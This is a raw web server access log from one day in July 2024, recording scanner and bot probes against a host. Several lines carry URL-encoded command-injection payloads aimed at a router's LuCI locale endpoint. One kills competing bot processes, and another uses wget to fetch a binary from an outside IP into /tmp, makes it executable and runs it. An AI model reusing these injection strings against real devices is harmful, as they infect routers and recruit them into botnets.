43.129.37.205 - - [08/Jul/2024:14:07:42 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:42 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:43 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:45 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:45 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:46 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:48 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:49 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:51 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:53 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:54 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:55 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:58 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:01 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:02 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:03 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:04 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:07 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:12 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:12 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:12 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:15 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:15 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:17 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:17 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:18 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:21 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:21 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:22 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:24 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:26 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:26 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:27 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:28 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:30 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:31 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:32 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:34 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:34 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:38 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:08:42 +0200] "-" 400 1930 45.148.10.174 - - [08/Jul/2024:14:13:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [08/Jul/2024:14:13:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 138.197.154.223 - - [08/Jul/2024:14:22:11 +0200] "-" 400 1930 138.197.154.223 - - [08/Jul/2024:14:22:11 +0200] "-" 400 1930 138.197.154.223 - - [08/Jul/2024:14:22:11 +0200] "GET / HTTP/1.1" 200 1895 138.197.154.223 - - [08/Jul/2024:14:22:12 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 94.156.10.163 - - [08/Jul/2024:14:30:21 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 87.121.69.27 - - [08/Jul/2024:14:31:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 117.254.77.94 - - [08/Jul/2024:14:35:16 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [08/Jul/2024:14:38:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [08/Jul/2024:15:15:59 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:15:59 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:15:59 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:15:59 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:15:59 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:15:59 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:15:59 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:15:59 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 167.94.145.110 - - [08/Jul/2024:15:20:44 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.110 - - [08/Jul/2024:15:20:47 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.110 - - [08/Jul/2024:15:20:47 +0200] "GET /favicon.ico HTTP/1.1" 404 729 174.138.2.203 - - [08/Jul/2024:15:21:40 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:21:40 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:21:40 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:21:40 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:21:40 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:21:40 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:21:40 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:21:40 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:22:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:22:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:22:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:22:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:22:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:22:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:22:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:22:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:30:46 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:30:46 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:30:46 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:30:46 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:30:46 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:30:46 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:30:46 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:30:46 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:37:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:37:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:37:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:37:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:37:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:37:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:37:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:37:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 94.156.71.235 - - [08/Jul/2024:15:38:14 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 174.138.2.203 - - [08/Jul/2024:15:39:00 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:39:05 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:39:06 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:39:07 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:39:07 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:39:07 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:15:39:10 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 207.167.66.170 - - [08/Jul/2024:15:40:37 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [08/Jul/2024:15:44:33 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:44:33 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:44:33 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:44:33 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:44:33 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:44:33 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:44:33 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:15:44:33 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 141.98.83.197 - - [08/Jul/2024:16:56:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [08/Jul/2024:16:56:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.148.10.174 - - [08/Jul/2024:17:07:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [08/Jul/2024:17:07:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 94.156.10.163 - - [08/Jul/2024:17:39:36 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 185.191.126.213 - - [08/Jul/2024:17:47:20 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [08/Jul/2024:17:49:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.10.164 - - [08/Jul/2024:17:49:47 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 71.6.232.24 - - [08/Jul/2024:18:03:47 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [08/Jul/2024:18:32:20 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 152.32.235.90 - - [08/Jul/2024:18:33:16 +0200] "-" 400 1930 152.32.235.90 - - [08/Jul/2024:18:33:26 +0200] "GET / HTTP/1.1" 200 1895 152.32.235.90 - - [08/Jul/2024:18:33:45 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.235.90 - - [08/Jul/2024:18:33:45 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.235.90 - - [08/Jul/2024:18:33:45 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 152.32.235.90 - - [08/Jul/2024:18:33:46 +0200] "GET /config.json HTTP/1.1" 404 729 87.121.69.27 - - [08/Jul/2024:18:48:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.109 - - [08/Jul/2024:18:53:02 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [08/Jul/2024:18:53:06 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [08/Jul/2024:18:53:06 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.236.176.158 - - [08/Jul/2024:19:17:03 +0200] "GET / HTTP/1.1" 200 1895 94.156.10.164 - - [08/Jul/2024:19:35:50 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 57.151.71.152 - - [08/Jul/2024:19:37:12 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [08/Jul/2024:19:38:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [08/Jul/2024:19:38:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 94.156.66.83 - - [08/Jul/2024:20:26:26 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 141.98.83.197 - - [08/Jul/2024:20:26:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [08/Jul/2024:20:26:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 104.168.70.165 - - [08/Jul/2024:20:31:14 +0200] "GET / HTTP/1.1" 200 1895 199.45.154.133 - - [08/Jul/2024:20:38:05 +0200] "GET / HTTP/1.1" 200 1895 199.45.154.133 - - [08/Jul/2024:20:38:11 +0200] "GET / HTTP/1.1" 200 1895 199.45.154.133 - - [08/Jul/2024:20:38:13 +0200] "GET /favicon.ico HTTP/1.1" 404 729 94.156.10.164 - - [08/Jul/2024:20:43:20 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 206.168.32.100 - - [08/Jul/2024:21:14:28 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.100 - - [08/Jul/2024:21:14:31 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.100 - - [08/Jul/2024:21:14:32 +0200] "GET /favicon.ico HTTP/1.1" 404 729 78.108.177.54 - - [08/Jul/2024:21:21:33 +0200] "GET / HTTP/1.0" 200 1895 94.156.10.164 - - [08/Jul/2024:21:51:33 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 147.185.132.138 - - [08/Jul/2024:21:57:57 +0200] "-" 400 1930 147.185.132.138 - - [08/Jul/2024:21:57:57 +0200] "-" 400 1930 174.138.2.203 - - [08/Jul/2024:22:02:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:22:02:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:22:02:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:22:02:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:22:02:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:22:02:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:22:02:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:22:02:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:22:10:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:22:10:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:22:10:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:22:10:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:22:10:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:22:10:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:22:10:51 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:22:10:51 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 87.121.69.27 - - [08/Jul/2024:22:35:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.236.176.234 - - [08/Jul/2024:23:10:26 +0200] "GET / HTTP/1.1" 200 1895